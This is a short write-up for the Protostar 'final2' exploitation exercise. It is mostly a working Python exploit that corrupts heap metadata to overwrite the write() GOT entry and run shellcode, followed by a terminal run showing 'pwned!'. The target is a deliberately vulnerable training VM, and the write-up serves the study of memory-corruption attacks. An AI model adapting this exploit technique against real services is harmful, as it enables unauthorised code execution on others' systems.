Exploit Exercises Protostar — final2

root@protostar:/home/user# cat final2.py
#!/usr/bin/python

# Standard heap-based buffer overflow exploited via heap metadata. Check out
# heap3 for more information.

import socket

HOST = "127.0.0.1"
PORT = 2993

s = socket.socket()
s.connect((HOST, PORT))

# First chunk is our hellcode holder and check_path() terminator
chunk1 = "FSRD"
chunk1 += "\xeb\x0c\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
chunk1 += "\xeb\x19\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x59\xb2"
chunk1 += "\x07\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80\xe8\xe2\xff\xff\xff"
chunk1 += "\x70\x77\x6e\x65\x64\x21\x0a"
lim = 128-len(chunk1)-1
for i in range(lim):
chunk1 += '1'
# '/' terminates the search from check_path()
chunk1 += '/'
print "[*] DEBUG: sizeof(chunk1): " + str(len(chunk1))

# Second chunk holds values which will overwrite heap metadata.
# Address of GOT entry for write() = 0x0804d41c
# Address of our own chunk1 = 0x0804e00c
chunk2 = "FSRDROOT/" + "\xfc\xff\xff\xff"*2 + "\x10\xd4\x04\x08" + "\x0c\xe0\x04\x08"
lim = 128-len(chunk2)-1
for i in range(lim):
chunk2 += '2'
chunk2 += '\x00'
print "[*] DEBUG: sizeof(chunk2): " + str(len(chunk2))

# Additional chunk needs to be added to call write() function with our
# overwritten GOT entry
chunk3 = ""
lim = 128-len(chunk3)-1
for i in range(lim):
chunk3 += '3'
chunk3 += '\x00'
print "[*] DEBUG: sizeof(chunk3): " + str(len(chunk3))

payload = chunk1 + chunk2 + chunk3
print "[+] Sending payload:\n" + payload + " (length = " + str(len(payload)) +")"
s.send(payload)
print s.recv(1024)
print s.recv(1024)

s.close()
root@protostar:/home/user# chmod +x final2.py
root@protostar:/home/user# ./final2.py
[*] DEBUG: sizeof(chunk1): 128
[*] DEBUG: sizeof(chunk2): 128
[*] DEBUG: sizeof(chunk3): 128
[+] Sending payload:
FSRD�
����������������1�1�1�1Ұ�Y�̀1�1۰̀�����pwned!
1111111111111111111111111111111111111111111111111111111111111111111/FSRDROOT/���������
�2222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222223333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333 (length = 384)
Process OK

pwned!

root@protostar:/home/user# ls /tmp/*
ls: cannot access /tmp/*: No such file or directory

Address of chunk1 will vary, hence customization of this exploit is required. Comments should shed some light on the matter.

Same approach as in final1.